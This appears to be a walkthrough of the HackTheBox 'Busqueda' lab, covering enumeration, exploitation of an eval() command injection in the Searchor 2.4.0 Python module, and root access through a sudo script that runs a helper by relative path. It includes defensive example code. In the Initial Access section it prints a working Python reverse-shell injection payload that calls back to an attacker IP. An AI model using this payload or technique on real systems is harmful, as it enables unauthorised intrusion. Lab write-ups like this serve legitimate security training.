HTB - Busqueda


In this walkthrough, we will go through the Busqueda room from HackTheBox. This room is rated Easy on the platform and consists of enumeration, exploitation and privilege escalation of a Linux boot2root machine. So, let’s get started without any delay.

Busqueda

Machine Info:

Title: Busqueda
IP address: 10.10.11.208
Difficulty: Easy
OS: Linux
Description: Busqueda is an Easy difficulty Linux machine that involves exploiting a command injection vulnerability in a Python module. To get root, we logged into the local Gitea service with credentials found in a config file and then abused a Python script running as root.

Enumeration:

  • I started off with a regular nmap scan with service detection and found two open ports – 22 (SSH) and 80 (HTTP). Port 53 showed up as filtered.

$ sudo nmap -sS -sV 10.10.11.208

Nmap scan report for 10.10.11.208
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.52
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.75 seconds

nmap scan

  • I tried to access the web server on port 80 and it redirected to the hostname searcher.htb, so I added it to my /etc/hosts file and accessed the application.

adding hostname

  • The Searcher application is a web app that searches a custom query across different search engines and online networks. I searched for some pussies using Google with auto-redirect unchecked, and it looks like the application builds a search URL for the chosen engine from the searched term.

Searcher

Looking for pussies

searching for pussies

  • Fired up gobuster to see if I could find some interesting directories, but had no luck with it.

$ gobuster dir -u http://searcher.htb/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://searcher.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/01 13:24:51 Starting gobuster in directory enumeration mode
===============================================================
/search               (Status: 405) [Size: 153]
/server-status        (Status: 403) [Size: 277]
                                               
===============================================================
2023/12/01 13:26:39 Finished
===============================================================

gobuster scan

  • Next, I intercepted the search request using Burp Suite and, in the response, found an interesting Server header showing the application runs on Python 3.10.6 with Werkzeug (Flask) 2.1.2. I searched for known exploits for that Flask version but found nothing.

Burpsuite POST intercept

Burpsuite Response

  • Next, the footer caught my attention, as it mentions a Python module name – Searchor – along with its version – 2.4.0.

Searcher 2.4.0 running

  • Searched for any known exploit for the module and found an exploit PoC for it. As per the PoC, the vulnerability lies in an eval() call on the search query, which lets us run arbitrary commands on the server and thus leads to command injection. Bingo!

Searcher 2.4.0 exploit

Arbitrary CMD Injection
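To make the eval() bug concrete from the defender's side, here is an added example (not Searchor's source and not the box's code) of the "build Python source from user input, then eval() it" pattern the PoC targets, beside a hardened URL builder and a small triage check for logged search terms; the engine names and URL templates are assumptions.

```python
"""Added example, not Searchor's source or the box's own code: the
"build Python source from user input, then eval() it" pattern the PoC
targets, beside a hardened builder. Engine names/templates are assumed."""
import re
from urllib.parse import quote_plus

# Constructed lookup table standing in for the module's engine list.
ENGINES = {
    "Google": "https://www.google.com/search?q={q}",
    "DuckDuckGo": "https://duckduckgo.com/?q={q}",
}


def build_url_unsafe(engine: str, query: str) -> str:
    """Vulnerable pattern: the query is pasted into a string literal inside
    Python source, so a quote in it ends the literal and anything after
    is executed by eval() as code instead of being searched for."""
    return eval(f"ENGINES['{engine}'].format(q='{query}')")


def build_url_safe(engine: str, query: str) -> str:
    """Hardened version: allowlist dispatch plus URL-encoding; no eval."""
    if engine not in ENGINES:
        raise ValueError(f"unknown engine: {engine!r}")
    return ENGINES[engine].format(q=quote_plus(query))


# A quote immediately followed by a comma or closing paren is the shape
# of a string-literal breakout; a lone apostrophe ("what's new") is not.
_BREAKOUT = re.compile(r"'\s*[,)]")


def looks_like_injection(query: str) -> bool:
    """Cheap triage check to run over logged search terms."""
    return _BREAKOUT.search(query) is not None
```

With the safe builder the PoC-shaped query comes back percent-encoded inside the URL rather than being executed.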

Initial Access:

  • Next, I used the Python reverse shell payload below to get initial access on the web server and captured the user flag.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.2',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

reverse shell payload

getting the shell

user.txt

Privilege Escalation:

  • To find potential privilege escalation vectors, I uploaded linpeas to the target and executed it.

uploading linpeas

  • The linpeas result showed some interesting directories containing git config files. Looking into the config file for the running Flask application revealed a new domain named “gitea.searcher.htb” and a user password.

Linpeas output

git creds

  • Added the new domain to our /etc/hosts file and logged in using the found credentials. The repository had one commit by the administrator, with a SHA1 hash alongside it.

adding hostname

gitea login

hash identifier

  • Moving on, I checked the sudo permissions for the user svc using the found password. The result showed that we can run the system-checkup.py script as root.

sudo -l

sudo -l

  • Checked how the script works by passing whoami as an argument; it threw an error showing the usage. The script takes three commands as arguments – docker ps, docker inspect and full checkup.

executing the script

  • I tried to run the script with full-checkup as the argument from my home directory and it failed. That means it uses a relative path for the full-checkup script instead of an absolute one.

checking the script

full checkup

  • I wrote a script that prints the contents of root.txt, gave it the same name as full-checkup, placed it in the /tmp directory and executed it via system-checkup.py, thus getting the root flag.

getting root

Machine completed
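The relative-path mistake above is worth seeing next to its fix. The following is an added example, not the box's system-checkup.py: a minimal sudo-run dispatcher that resolves the helper next to the script itself and refuses to run it unless it is a regular, non-symlink file owned by the expected user and not writable by group or others. The helper name full-checkup.sh and the owner_uid parameter are assumptions.

```python
"""Added example, not the box's system-checkup.py: the relative-path
bug beside a hardened dispatcher. Helper file name is an assumption."""
import os
import stat
import subprocess
import tempfile
from typing import Optional

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))


def run_full_checkup_unsafe() -> int:
    # Relative path: resolved against the caller's cwd, so whoever may
    # invoke this via sudo also chooses which file runs as root.
    return subprocess.run(["./full-checkup.sh"]).returncode


def helper_is_trusted(path: str, owner_uid: int = 0) -> bool:
    """Regular file (not a symlink), owned by owner_uid, and not
    group- or world-writable; otherwise refuse."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode) or st.st_uid != owner_uid:
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def run_full_checkup_safe(helper: Optional[str] = None, owner_uid: int = 0) -> int:
    """Hardened: absolute path anchored to the script's own directory,
    ownership/permission check, and a fixed cwd for the child."""
    path = helper or os.path.join(SCRIPT_DIR, "full-checkup.sh")
    if not helper_is_trusted(path, owner_uid):
        raise PermissionError(f"refusing to run untrusted helper: {path}")
    return subprocess.run([path], cwd="/").returncode


def demo() -> dict:
    """Self-check on a constructed helper in a temp dir (no root needed):
    the helper is trusted at 0755, runs and returns 7, then is rejected
    once made world-writable."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "full-checkup.sh")
    with open(p, "w") as f:
        f.write("#!/bin/sh\nexit 7\n")
    os.chmod(p, 0o755)
    me = os.getuid()
    result = {"trusted": helper_is_trusted(p, me),
              "rc": run_full_checkup_safe(p, me)}
    os.chmod(p, 0o777)
    result["world_writable_trusted"] = helper_is_trusted(p, me)
    return result
```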


Conclusion:


So that was “Busqueda” for you. We started off with our regular nmap scan and found two open ports – 22 (SSH) and 80 (HTTP). Next, we enumerated the web server on port 80 and found a Searcher application running that used the Searchor 2.4.0 Python module. We looked for any known exploits related to it, found one and used it to get initial access on the target. For privilege escalation, we found the git creds in a git config file, logged into the gitea subdomain with them and found the password for user svc. At last, we abused the system-checkup.py script to get root. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.
